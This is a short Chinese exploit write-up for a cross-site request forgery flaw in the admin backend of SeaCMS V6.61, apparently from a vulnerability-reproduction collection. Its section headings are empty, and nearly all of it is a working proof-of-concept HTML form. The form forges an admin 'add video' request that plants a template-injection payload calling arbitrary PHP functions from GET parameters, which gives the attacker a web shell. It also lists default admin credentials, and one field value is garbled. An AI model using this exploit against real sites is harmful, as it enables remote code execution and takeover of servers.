Seacms V6.61 后台csrf
一、漏洞简介
二、漏洞影响
三、复现过程
http://www.0-sec.org:10089/backend/
,用户名和密码为admin | admin
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<!-- adjust action to your url -->
<form action="http://www.0-sec.org/seacms/backend/admin_video.php?action=save&acttype=add" method="POST">
<input type="hidden" name="v_commend" value="0" />
<input type="hidden" name="v_name" value="getshell" />
<input type="hidden" name="v_enname" value="ceshi" />
<input type="hidden" name="v_color" value="#FF0000" />
<input type="hidden" name="v_type" value="5" />
<input type="hidden" name="v_state" value="5" />
<input type="hidden" name="v_pic" value="{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}" />
<input type="hidden" name="v_spic" value="" />
<input type="hidden" name="v_gpic" value="" />
<input type="hidden" name="v_actor" value="" />
<input type="hidden" name="v_director" value="" />
<input type="hidden" name="v_commend" value="0" />
<input type="hidden" name="v_note" value="" />
<input type="hidden" name="v_tags" value="" />
<input type="hidden" name="select3" value="" />
<input type="hidden" name="v_publishyear" value="" />
<input type="hidden" name="select2" value="" />
<input type="hidden" name="v_lang" value="" />
<input type="hidden" name="select1" value="" />
<input type="hidden" name="v_publisharea" value="" />
<input type="hidden" name="select4" value="" />
<input type="hidden" name="v_ver" value="" />
<input type="hidden" name="v_hit" value="0" />
<input type="hidden" name="v_monthhit" value="0" />
<input type="hidden" name="v_weekhit" value="0" />
<input type="hidden" name="v_dayhit" value="0" />
<input type="hidden" name="v_len" value="" />
<input type="hidden" name="v_total" value="" />
<input type="hidden" name="v_nickname" value="" />
<input type="hidden" name="v_company" value="" />
<input type="hidden" name="v_tvs" value="" />
<input type="hidden" name="v_douban" value="" />
<input type="hidden" name="v_mtime" value="" />
<input type="hidden" name="v_imdb" value="" />
<input type="hidden" name="v_score" value="" />
<input type="hidden" name="v_scorenum" value="" />
<input type="hidden" name="v_longtxt" value="" />
<input type="hidden" name="v_money" value="0" />
<input type="hidden" name="v_psd" value="" />
<input type="hidden" name="v_playfrom[1]" value="" />
<input type="hidden" name="v_playurl[1]" value="" />
<input type="hidden" name="m_downfrom[1]" value="" />
<input type="hidden" name="m_downurl[1]" value="" />
<input type="hidden" name="v_content" value="" />
<input type="hidden" name="Submit" value="�¡®�®š�浜¤" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>